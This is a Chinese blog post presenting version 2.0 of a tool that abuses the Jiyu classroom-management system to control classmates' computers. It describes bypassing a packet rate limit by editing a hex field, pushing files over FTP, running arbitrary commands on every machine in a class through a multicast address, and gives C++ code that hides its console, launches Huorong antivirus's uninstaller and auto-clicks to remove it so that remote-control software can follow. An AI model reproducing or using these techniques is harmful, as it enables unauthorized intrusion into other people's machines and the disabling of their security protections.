本文主要是介绍反控极域 V2.0,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
首先奉上源码:源码链接
exe链接(在学校没手机,回去我再上传,毕竟那有一堵墙)
本次更新使得程序更加完善,软件页面如下:
更新的内容:
1.不限制发送时间间隔!!
2.添加了简介,在如上图X的左侧
3.增加了一些方便的功能,如快捷键隐藏界面,通过文件导入内容,文件上传等功能
大框架基于V1.0版本,这里不补充说明了,说明一些主要功能的实现
1.取消时间间隔
相信大家都能抓包抓到payload
让我们先看这篇文章,链接
文中作者提到了这点
这一段很有可能就是固定不变的值,起码DMOC这段十六进制是不变的,后期发现,相同数据包在一分钟之内只能发送一次,后面我没有去改代码,应该是dmoc后面随机几个字符,就可以实现了,有大佬有能力可以试试,这些都是猜测,如果说的不对也不要怪我哈
通过不断的尝试(其实就试了5个地方。。),发现这里是可以改变并正常运行的
是的就是这里,我们只需改变这里的十六进制值,便可以不限时间发送命令(别问我为什么,我也不知道。。。)
2.隐藏界面
代码由另一名同学完成(w*x)
可以通过Ctrl+q实现隐藏/显示界面
因为不懂Python所以不知道说些什么好,大部分的软件ui都是由这位同学完成的,感谢~
3.文件传输
使用FTP进行上传文件
先打开FTPserver,选中下载文件,将用户名和密码改掉后启动服务
然后执行命令中的代码,代码要根据分隔线一块一块打,因为极域有长度限制。。,复制到长命令那执行即可(通过主程序)
先更改第二行的ip为自己电脑ip
然后改文件名
注意:这里我是让对方下载我桌面的文件,所以要把文件先放桌面(或者你也可以改命令)
如何让对方电脑执行文件?(不会有人不知道吧【doge】)
直接输入命令 "文件绝对路径"
4.远控
这里远控软件大家自己找。。作者概不负责
但可以教怎么删掉杀软
首先你需要找到电脑中杀软的路径,然后点击uninstall.exe
通过这段C++代码来删杀软(为什么不用Python,1.生成的文件有点大,FTP传的不够快容易败露 2.我不会)
#include <iostream>
#include <thread>
#include <windows.h>
using namespace std;
void mousemove(){for(int i=1;i<=10;++i){Sleep(500);SetCursorPos(680,580);//移动到指定位置mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0);//按下左键mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0);//松开左键}
}
void openfile(){char s[]=" \"\"C:\\Program Files (x86)\\Huorong\\Sysdiag\\uninst.exe\"\" "; //打开杀软 cout << s;system(s);
}
void hideconsole(){HWND hwnd;hwnd=FindWindow("ConsoleWindowClass",NULL); //处理顶级窗口的类名和窗口名称匹配指定的字符串,不搜索子窗口。if(hwnd){ShowWindow(hwnd,SW_HIDE); //设置指定窗口的显示状态}
}
int main()
{hideconsole();thread t1(openfile);thread t2(mousemove);t1.join();t2.join();return 0;
}
鼠标的位置和杀软的路径需要自己弄,弄好后编译运行,将生成的exe和libstdc++-6.dll打包,在通过文件传输送给你的同学就好了
删了杀软后的步骤相信大家都会了【doge】
说明(想到的就写一点):
1.开始ip列表有的那个ip是组播ip,使用它你将可以控制全班电脑【doge】
2.如何执行任意命令的? 参考这篇文章
里面有一个MS-DOS方式,去年看到这里才明白的
3.长命令的实现方式?
将换行符/n改为&号即可
这篇关于反控极域 V2.0的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!